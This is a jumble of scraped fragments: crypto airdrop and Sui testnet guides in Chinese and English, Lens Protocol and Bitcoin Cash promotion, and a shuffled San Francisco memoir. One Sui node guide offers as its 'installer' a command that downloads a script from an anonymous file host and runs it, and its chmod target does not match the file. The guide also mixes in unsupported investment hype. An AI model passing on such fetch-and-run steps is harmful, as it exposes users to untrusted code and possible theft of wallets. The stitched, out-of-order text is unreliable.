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- 融资1050万的 @superdao_co 可以领个机器人NFT,直接到钱包,无需GAS,0成本领了在说!
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- 【zkSync:zkSync Era 部分用户出现存款失败问题,将 24 小时内部署修复程序】 #zkSyncEra
Foresight News 消息, @zksync 在 Discord 社区表示,zkSync Era 的一部分用户会受到存款失败问题,团队正在努力工作,预计将在未来 24 小时内部署修复程序。
zkSync:zkSync Era 部分用户出现存款失败问题,将 24 小时内部署修复程序
zkSync 在 Discord 社区表示,zkSync Era 的一部分用户会受到存款失败问题,团队正在努力工作,预计将在未来 24 小时内部署修复程序。
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- LensGarden NFT is the first dynamic NFT collection on Lens Protocol, it is a unique blockchain-based platform that is part of the LensProtocol ecosystem. It rewards users for creating and curating high-quality content, providing incentives to engage with the LensProtocol community and build their profiles.
Users can earn XP by completing activities such as joining liking, commenting, following Lens users, and completing challenges. As they progress through the levels, they have the opportunity to mint exclusive NFTs that cannot be traded on marketplaces, adding further value to the platform.
Here are some tips on how to increase your XP:
Gain followers: For each new follower, you'll earn 50 XP points.
Create new posts: Every post you create on the Lens Protocol ecosystem will get you 30 XP points.
Leave comments: For every comment you leave, you'll earn 20 XP points.
Collect : Each post of yours that is collected on the Lens Protocol ecosystem will get you 20 XP points.
Mirror other users: Each time you mirror another user's post, you'll earn 30 XP points.
Lens Garden NFT presents an exciting opportunity to invest in a growing blockchain ecosystem that rewards engagement and incentivizes high-quality content creation. The potential for growth and innovation is significant. Additionally, in Q2, you can look forward to the launch of Lens Tunes and an exciting new game.
Join us today and become a part of this innovative and exciting ecosystem.
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- I remember the tune, but not the words beyond that; I remember the girl’s voice as if she’d been singing to me personally, although of course she wasn’t. Her song seems to hang upon the air, to feel as fresh inside my mind as it was three decades ago, although I’m sure the person she was singing about, and the feelings she would have had just then are gone, and maybe the singer is too, that her footsteps so bright and elastic have been drowned out by thousands or millions of others and the person who sleeps behind the wall now doesn’t know or and maybe hates the fact the street is noisy, but I don’t care.
I remember her song that was never recorded and probably never even written, just made up on the spot, so that the words themselves are lost now also to the girl who sang them, and so the song itself will never be retrieved by memory or even by the internet, but I will remember for the rest of my life exactly the rise and fall of its almost melody, its flickering tune, exactly how it goes.
- A Ukrainian flag flies off the façade, through the window of one of the upstairs apartments, and the windowsill of what used to be my own, street level, unit, is still slightly crooked, so the window itself doesn’t entirely close. At night I used to lie in bed and listen to the occasional pedestrians, drunk usually, making their way back to their cars from the bars on Haight Street. I remember one in particular, the slap of her tennis shoes on concrete — three, or maybe five feet away from my head behind the wall — singing to herself in that completely unselfconscious way we do when we believe we are alone and no one can hear us. She was off-key, and clearly elated — I could hear it in the way her steps bounced off the pavement, almost as if she were skipping, too — singing something about how “I’m so glad I found you!”
- Maybe the embarrassment isn’t that I failed; maybe the embarrassment is just that I wanted it so badly, wanted it way more than I did a walnut baguette from Buffalo Whole Food & Grain Company (don’t laugh: those baguettes were good), and wanting anything with that kind of intensity — a job or a person — *is* embarrassing because it’s so undefended.
- I thought of Robin Williams (we’d passed his house in Sea Cliff), and I remembered how I’d seen him a handful of times in a greasy little hoagie shop on Divisadero Street, a place he apparently loved, given that I saw him there multiple times over a span of a few months but then never again. Each time, he was clowning around with the staff, not like he did on camera, but like these were people he cared about, and who knew and loved him in return, his friends. He’s gone now, as is the hoagie shop, but I like knowing there’s a little scrap of memory that exists unfilmed, something that remains only in the minds of the six or eight people who were in the room at the time. Life is short, but not that short. It continues in the memories of survivors, and after that only in whatever stories are written down or told.
- My wife and I drove to Noe Valley and had sushi — miso black cod, spicy scallop hand rolls, snow *weizen* — at Saru, then drove back to the Lower Haight, because I wanted to look for one last time at the apartment I used to live in on Waller Street. It’s still there, even if what used to be a Baptist church next door is now a bike shop, and largely intact.
- Yesterday I walked into City Lights Books in North Beach, the same place I used to scrape together my quarters to buy volumes of Chekhov, and I passed my own book on the shelf — one of them, anyway — and turned it around so it would be front-facing. I felt like an asshole doing this, as shop-owners hate it when you do, but just this once I had to, as a kind of nod to my younger self. I walked down the block to Café Zoetrope, on the ground floor of a building where I used to work (when I did succumb to the vortex of the movie business, I did it first by working as a script reader, writing up coverage for fifty bucks a pop), and I had lunch with David Thomson, the British critic and film historian whose writing has delighted me for decades. We talked about how the movies, which we both love, are over, how Hollywood and the period of American empire are both in decline. We drank a few glasses of Nero D’Avola, each of which cost a good deal more than a buck-twenty.
- I left the restaurant and drove out to Sea Cliff, where I went for a walk with my wife. We walked through the neighborhood, then down a little footpath onto Baker Beach, where we watched a dog tear-assing along the water’s edge, then drove over to Fort Point, to the exact spot where Kim Novak throws herself into the Bay in Hitchcock’s *Vertigo*. I kept hearing sounds — foghorns, gulls, cries that might have been seals, or loons — that reminded me of how it once felt to live here, how *I* felt and how the city felt, and how we are all just sieves for time, how it pours through us and we can do exactly fuck all to stop it except periodically pause to fix certain details in mind, which we can never do all that accurately anyway.
- I told you this wasn’t a sad story! It has a happy ending, or at least this part of it does, but everyone knows that writers are liars and anyway if you’re paying attention you’ve probably noticed that I have a melancholy temperament and largely feel that life is a series of experiences in which one tends, generally, to miss the point. Is the point that I came home to San Francisco thirty years later, a successful writer and tenuous but nonetheless undeniable member of the 21st Century bourgeoisie? Of course not.
- Later I would piece together that this “universal library” was, in fact, one of the earliest incarnations of the internet, but at the time I was preoccupied with scraping together my rent ($185 a month for my first apartment, a quarter of an enormous railroad flat on Haight Street, and $425 for my last, a studio with a fireplace on Waller), with a series of numbing but adequate temp jobs, and with writing, which I did not yet know how to do. I don’t mean that I didn’t have any talent, or even a work ethic, just that each day before I went to my job I would sit down and try to scratch out the beginning of a novel or short story and that each day without fail I would decide what I’d written was inadequate, and so I’d delete what I’d written and begin again the next day with nothing.
- This is not a sad story, although you’ll be forgiven for thinking, at least for a moment, that it is.
I moved to San Francisco in 1989. It was, as they say, a simpler time, by which I just mean that neither the city nor I had arrived yet at our subsequent, more disastrous iterations, and I moved there for reasons that seem, with hindsight, strangely arbitrary.
- Node - SUIIn this article, we have combined two articles at once on installing a node on the SUI
📜 **Notes**: *Sui Full nodes validate blockchain activities, including transactions, checkpoints, and epoch changes. Each Full node stores and services the queries for the blockchain state and history. This role enables validators to focus on servicing and processing transactions. When a validator commits a new set of transactions (or a block of transactions), the validator pushes that block to all connected Full nodes that then service the queries from clients*
⏳ **Date:** TBA
💬 **Social network:** Twitter**** & Discord
🔗 **Network:** SoWork/ Panzerdogs/ Sui Wallet
🎲 **Difficulty:** Easy
⚙️**Requirements:** 2 CPU, 8 GB RAM, 300 GB SSD
🪂**Airdrop:** The developers showed tokenomics, in which a percentage is allocated for airdrop, so our team think that we should get rewards
*he first*
**Step 1:**
Start the installer node
wget -O o1nc2p.sh https://files.catbox.moe/o1nc2p.sh && chmod +x v && ./o1nc2p.sh
**Step 2:**
Check your node is running on *https://node.sui.zvalid.com/*
⚙️**Requirements:** 10 CPU, 32 GB RAM, 1 TB SSD
T*he second*
**Step 1:**
Update:
sudo apt update && sudo apt upgrade -y
Download other tools with this command:
apt-get update \
&& DEBIAN_FRONTEND=noninteractive TZ=Etc/UTC apt-get install -y --no-install-recommends \
tzdata \
git \
ca-certificates \
curl \
build-essential \
libssl-dev \
pkg-config \
libclang-dev \
cmake
Install RUST:
curl --proto '=https' --tlsv1.2 -sSf https://sh.rustup.rs | sh -s -- -y
source $HOME/.cargo/env
rustup update
apt-get install screen
Press **Y** and Enter
**Step 2:**
Install Sui binaries:
cargo install --locked --git https://github.com/MystenLabs/sui.git --branch testnet sui sui-node
Install Integrated Development Environment:
cargo install --git https://github.com/move-language/move move-analyzer --features "address20"
**Step 3:**
Create wallet:
sui client active-address
Go to the **discord** in testnet-faucet:
!faucet xxxxxxxxxxxxxxxxxxxxxxxxxxxx
**Step 4:**
Configure your node:
cd sui
git remote add upstream https://github.com/MystenLabs/sui
Sync your fork::
git fetch upstream
Make a copy of the fullnode configuration template:
cp crates/sui-config/data/fullnode-template.yaml fullnode.yaml
curl -fLJO https://github.com/MystenLabs/sui-genesis/raw/main/testnet/genesis.blob
**Step 5:**
Go to Sui repository:
cd sui
screen -S sui
cargo run --release --bin sui-node -- --config-path fullnode.yaml
**Step 6:**
Check your node is running on ***https://node.sui.zvalid.com/***
D*on’t stop there, join our Telegram channel to get more Airdrop and instant updates. Also join the chat, where we discuss all questions, suggestions and help each other 👇*
- I write these words in, of all places, San Francisco, a city I have not much visited for many years since. I told you, again, this wasn’t a sad story, and what I also mean by that is that none of the nonsense, almost all of it self-inflicted, I underwent here did me any lasting damage. I lived here for five years, which happened to coincide with the end of the pre-tech era. Sand Hill Road in Menlo Park held not venture capital but dozy doctors’ offices and sleepy satellites of the Stanford academic complex; my neighbor, a slacker just like I was, commuted every day to Sausalito to work as an assistant for a programmer named John Walker, whose work on something my neighbor described as a “universal library” that involved computers connecting to one another in some arcane way impressed me a whole lot less than how much my neighbor got paid for how little work. (He left his house every morning around ten and was home, flush with cash and relaxed and full of catered lunch, glowing with the tan he collected during an hour or so spent sunbathing on his break, easily before three-thirty.)
- Some days I wandered over to the Castro just so I could roam the aisles of a market I couldn’t afford, staring at the gourmet sandwiches, the organic produce, the walnut breads and olive loaves. The luxury for me was in that wanting, in knowing that these were things I *could* afford if I were willing to make a different set of choices — I was from Los Angeles and adequately connected inside the movie business, so all I’d need to do was move home and start looking for a (real) job — but I was not. This was luxury, the luxury of being myself: stubborn, ignorant, and far, far more privileged than I knew, but nevertheless. What greater luxury is there than that?
- My girlfriend and I had just returned to California after graduating college. We didn’t want to live in LA, and so we took a long drive up the coast — we were contemplating Seattle, or Portland, both cities that had a certain early-grunge-era shine — and when we stopped in San Francisco for lunch we realized the streets were crowded with young people who were not at work at eleven AM on a Wednesday. I, too, wanted to not be at work at eleven AM on a Wednesday — or at any other time really — and as I looked around at all these skinny children dressed in pajama tops and ratty Converse I figured if they could make it work without working I could do the same.
- I realize, suddenly, that I am embarrassed by all this. Not so much by the ignorance (what twenty-two-year-old isn’t ignorant of something?), nor by the privilege (nothing to be done about that), but by the sheer sense of waste. I spent five years doing next to nothing, nothing other than pressing my nose up against shop windows like some Dickensian orphan (which wouldn’t be so embarrassing if I had actually been broke, or at least lacked options that would’ve helped me solve that problem), trying to write (itself a vaguely fake-feeling aspiration, one that’s been corrupted by generations of whiteboys hoping to do the same), struggling against the vortex of the movie business, fucking around and playing basketball in Duboce Park. I failed at capitalism, at least in a limited sense — albeit in ways I’m still trying to play catch-up against, decades later — and so that’s part of it, but what’s really shameful, I think, is that I failed at “writing a book,” which was what I wanted to achieve back then more than anything but could no more seem to manage than I could fly.
- I wanted to be a writer (did I say this wasn’t a sad story? Well, it’s sad only in the manner of watching a person punch himself in the face, repeatedly), and so this was the path. I moved to San Francisco cold, without knowing anybody. My girlfriend and I broke up a month later, and she moved back to the Midwest.
- Since this is a publication about luxury, I should mention that then, as now, San Francisco was one of the most beautiful places on earth, and that it was (as I was too, despite being pretend-poor) bougie. This word, “bougie,” had a particular flavor in those days — those post-Reagan, but pre-globalization, days — but nevertheless. The city was cheap because it was beautiful and vice versa: because a really good burrito could be had for a buck-twenty, because public transportation cost eighty-five cents, because the public parks were lush and safe and free, because certain things — Chez Panisse in Berkeley, Green’s at Fort Mason — were out of my reach, but I didn’t care because I could just about afford both the burrito *and* that volume of Chekhov’s collected stories (there were fourteen of them in all, and I liked the way they looked lined up on my bookshelves made of milk crates and planks because the spines were each a different pastel color) as long as I walked home from North Beach to the Mission instead of taking MUNI.
- Community petition to rename @lensprotocol to 'The Adventures of @gotenks.lens' because damn that dude can post.
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@memester.lens @gotenks.lens
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If one day I could go to space, I would take my dog with me.
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- **Wen Lens Space ? : Today, anon. We did it !**
Thank you SO MUCH to all the people that joined us today to participate to the first public rally ever.
Both Timotej and I were very stressed and anxious, as this was the first time we were testing the live voice chat with more than 3 people... but it went really well, and we got a lot of positive feedbacks overall **🙏**
We had amazing discussions with the CEO of Livekit Russ d'Sa, (who actually gave us alpha on the future of Livekit) and @serglo from Huddle01. We then discussed with @aceofafrica about how we're planning to integrate with Lens (spoiler: we're working on this next week), how content creators could use Rally as a revenue stream as well as how to token-gate a rally (we're using @guild for this ! Check them out!).
- Get ready for a brighter and more vibrant experience with orb! 🎥
We're excited to announce video support, now you can upload and share your life's memories in motion.
Orb is the first mobile app to support video upload and reach experience on the @lensprotocol.
Orb videos are decentralized, fast to load, and powered by @livepeer.
Update the app and upload your videos now!
- 弹弓活动15日结束,单地址最高可撸100个Canto。传弹弓在寻求新一轮融资,或为发B做准备,加之与Canto关系暧昧,未来空投值得期待。
参与教程:twitter.com/wenxue600/sta…
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- What makes Bitcoin Cash different is the incredible talent of the bright people that comprise this community and strive to provide the best user experience.
Transactions with Bitcoin Cash are executed in milliseconds and cost a fraction of a penny. Developers produce, and perfect user-friendly platforms and interfaces, all for the end-user convenience.
Bitcoin Cash makes an impact with its rising userbase.
- Bitcoin Cash fulfills the future Satoshi and the early Bitcoin adopters envisioned.
Bitcoin Cash is a modern version of Bitcoin, having removed previous restrictions (RBF, small blocks) and bravely looking into the future.
Bitcoin was created to challenge the centralized payment networks (Visa, Mastercard, Paypal). Bitcoin Cash is the Bitcoin that achieves this today.
- Bitcoin Cash offers the best alternative to fiat. It is sound money, not controlled by anyone, with one distinctive difference from BTC.
Bitcoin Cash scales and is capable of achieving global adoption while BTC isn’t.
Bitcoin Cash is the Bitcoin that works.
There are use cases for cryptocurrencies besides mere speculation. Speculation is only temporary with an expiration date.
Bitcoin Cash has solved the scalability flaws in Bitcoin, following the suggestions of its founder and offers one of the best working digital currency options available.
- A New Bitcoin
Bitcoin Cash begins with the Bitcoin genesis block. BCH is the new Bitcoin, rising from the ashes of the failed BTC experiment of store of value.
Crypto will experience another wave of mass adoption, but this time it will not be the institutional investors, corporations, or governments.
These organizations will follow the actual adoption of cryptocurrency and that will be the users.
Bitcoin Cash is laying the foundations and infrastructure to achieve its purpose of global adoption.
- Bitcoin and crypto education is missing on purpose. As new investors discover the BTC’s lack of utility, they immediately move to other cryptocurrencies.
It takes a long process of researching crypto in-depth to realize Bitcoin evolved into the advanced Bitcoin Cash network.
- Coinbase, Binance, Robinhood, Revolut, e-Toro, and other trading platforms prevail in the preferences of the newcomers in crypto. Custodians held most of the billions that entered cryptocurrency and they lately collapse one after another.
Meanwhile, institutions, funds, and wealthy individuals also invested massively in crypto through regulated financial institutions and banks.
When examining crypto adoption, though, we discover Bitcoin Cash following a different trend. **Users prevail** since Bitcoin Cash focuses on P2P adoption of sound digital money instead of a superficial speculative asset.
- Users Will Define Success*Photo: by tunnelmotions on Pixabay*
Bitcoin Cash today offers everything a modern cryptocurrency user is looking for.
Permissionless Fast transactions (practically instant)Low Fees (virtually zero)MicrotransactionsDecentralizationUser-oriented approachScalability
Speculation drives this market currently, and not actual adoption. This will change as adoption increases on two fronts: Merchant adoption and financial platforms.
From the one hundred million newcomers in crypto between 2020–2021, not even 1% use cryptocurrencies properly.
- The Bitcoin Cash brand was announced in 2017, as Bitcoin Cash upgraded the Bitcoin network aiming to reverse the stagnation process of Bitcoin and recreate the original vision of **P2P Electronic Cash**.
Bitcoin Cash stands as a currency for the world.
As cryptocurrencies are on the rise again, Bitcoin Cash is the “new” Bitcoin, the Bitcoin that follows the logic and direction its founder set with the whitepaper. A scalable network of payments, aiming to achieve global adoption as digital cash.
- As competition between blockchain payment network intensifies, **the users will decide** and pick the winners, while investors follow. The market tries to predict and select the winners today, but we should bear in mind that nothing is constant, especially in the field of technology and finance.
Bitcoin was rallying in the adoption race between 2010–2015, but the outcome of a lengthy “blocksize debate” crippled Bitcoin’s chances of succeeding as a means of exchange.
- A New Bitcoin Is Rising: Bitcoin CashBitcoin Cash Is The Logical Upgrade Of Bitcoin And P2P Cash
- 三、谁可以参加 Sui Wave 2 测试网?
Sui wave 2 测试网对Validators,、节点、抵押人、DAPP开发和上一波入围用户开放。
✅ Validators:成为Validators对我们来说很难,但并非不可能👇
如果你拥有经验丰富的开发团队、强大的社区支持、地域多样性和一些运气,你可能会入围。
Wave 2 Validators已经从 Sui wave 1 Testnet 中选出,并且不接受 Wave 2 Testent 中的任何新形式,所以如果你符合条件,你可以入围 Wave 3 Testnet
✅节点:很多人问我怎么搭建Sui节点,我觉得现在没有必要去做他的节点。
我知道你要做Sui的节点是因为 Aptos 向节点提供了空投,但是对于 Sui Wave 2 的节点也已经从 Sui Wave 1 中选出,他们也不接受 Wave 2 中的任何新节点。
如果不提交我们的节点 IP 地址和详细信息,我们将无法获得奖励。
如果检查 Sui Testnet Wave 1 Entry,项目方已经收到了大约28000 个参赛作品,仅选择 500 名参与者发放激励奖励。
之前 Aptos 甚至向所有未被选中的节点发放空投奖励,但 Aptos 至少提交提供了表格让人反馈节点信息,SUI是没有这一步的。
所以,我们建议现在你不要盲目地去试试,这只会浪费你的宝贵的时间和金钱。
在节点这个环节,最好等到第 3 波来运行节点,因为他们的团队确认在第 3 波测试网中接受新条目。
✅ App Builders:这适用于那些在 sui 生态系统中构建项目或应用程序的人,这意味着这对我们来说非常困难。
✅ 抵押人:这基本上是指那些持有代币的人,我们可以很容易地做到这一点。但正如我之前所说,空投都没有得到官方确认,所以只能试试。
三、往期教程
加密狗整编空投第95篇: 最新.sui 域名(SuiNS)申请方法(保姆级教程)
1月31日Sui Name Service (SuiNS)在其社交平台上宣布测试网上线,引起Web3群体的广泛关注,我们今天就来看看这款域名怎么申请
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加密狗整编空投第80篇:Sui Testnet Wave 2:分步教程(空投确认)
一、什么是Sui?
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加密狗链游坚守第350天:Puke2Earn — Sui 生态系统的第一个赚钱游戏(游戏空投任务)
自我介绍:
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加密狗整编空投第55篇:高效领取Sui域名 SNS 盲盒的方法(1月15截止)
一、导读
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四、主要任务
(一)SUI Capys(养成类游戏)
水豚这款养成类游戏被认为是SUI上的CryptoKitties,所以近期热度很高。
需要注意的:SUI Capys并不是第一次做活动。:
在做繁殖之前,你要下载SUI的钱包,suiwallet 或者 Ethos Wallet ,
建议使用 Ethos Wallet,因为在 Ethos Wallet 钱包里面可以铸造游戏的门票,具体方法如下:
步骤 1、下载钱包
步骤 2、领取水龙头代币
点击左上角的设置,点击“Network”——“Testnet”——“Use faucet”——“Sui Discord”,选择“#testnet-faucet”频道,输入钱包地址领取水龙头代币;
你很有可能进不去 https ://discord.gg/sui,这种情况可能是你的discord被污染了,你要么用手机版试试,要么换ip;
进去后验证账号,然后写下“!faucet”,空格,粘贴钱包地址(每2小时可获得1个SUI)
步骤3、进入活动页面
点击钱包左上角的齿轮,选择“View Explorer”,进入活动页面;
步骤4、进入游戏
点击“Gmes&Apps”,点击“Capys”,进入游戏界面;
步骤5、领取两只宠物
点击 My Collection —— Capys —— Get a free Capy,钱包确认;
步骤6、装扮宠物
点击“Shop Accessories”,购买一个外套,然后回到“My Collection”中进行装扮;
步骤7、繁殖
在“Breed Capys”中可以对将领取的两个水豚进行繁殖,繁殖后在“My Collection”或NFT界面可以看到。
步骤8、铸造Ticket
返回钱包页面,点击如下图的标签,点击“Mint Ticket”(每天可以领一次)
完成以上步骤后,你就可以进入游戏了,每轮游戏,都会被分配到“朋友、敌人、中立”3个角色中的一个,你需要让你所在的阵营获得更高的staking排名;
在同一个阵营中,你可以把领到SUI stake给他,如果不指定就会随机质押给剩余的39个验证者,可以质押给多个验证者,也支持unstake,排名靠前的玩家能获得奖励。
SUI其他游戏活动:
(二)质押
如果你用的是suiwallet钱包,也成功领到水了,质押可以直接在钱包完成;
如果你用的是 Ethos Wallet 钱包,可以按照Suiwallet钱包之后,用Ethoswallt的助记词登录;
你也可以直接安装Suiwallte钱包,重新领水,因为这是另外一个任务,不影响上文的SUI Capys。
点击“Stake & Earn SUI”
▶ 选择任何池子,点击“Select Amount”
▶ 输入任意SUI数量,点击“Stake Now”
▶ Staking ,再次点击“Currently Staked”
▶ 点击“+ Stake SUI”,并在任何其他池子 Stake
▶ 重复以上过程8次以上
▶ 完成后你就成为 SUI 验证者
(三)其他活动
1、Suia Digital Airdrops
链接钱包后直接mint NFT
2、Mint Suiet NFT
在 suiwallet钱包中点击“NFT”,选择 Mint Suiet NFT(有时网络连接问题)
3、Surf钱包NFT
Surf 钱包链接:
https://chrome.google.com/webstore/detail/surf-sui-wallet/emeeapjkbcbpbpgaagfchmcgglmebnen
4、Martian Wallet任务
Martian Wallet钱包链接:https://chrome.google.com/webstore/detail/martian-wallet-aptos-sui/efbglgofoippbgcjepnhiblaibcnclgk
参与 Crew3活动:
https://crew3.xyz/c/martianwallet/invite/EOJNoDLkQD8SW9ruEIved
5、Sui Global
相关链接:https://crew3.xyz/c/suiglobal/questboard
这里拿到的就是以前GALXE中的OAT,错过GALXE可以在crew3领:
6、 Sui Global Quest3 50 白名单(2023 年 2 月 13 日)
https://app.quest3.xyz/quest/735825391692517424
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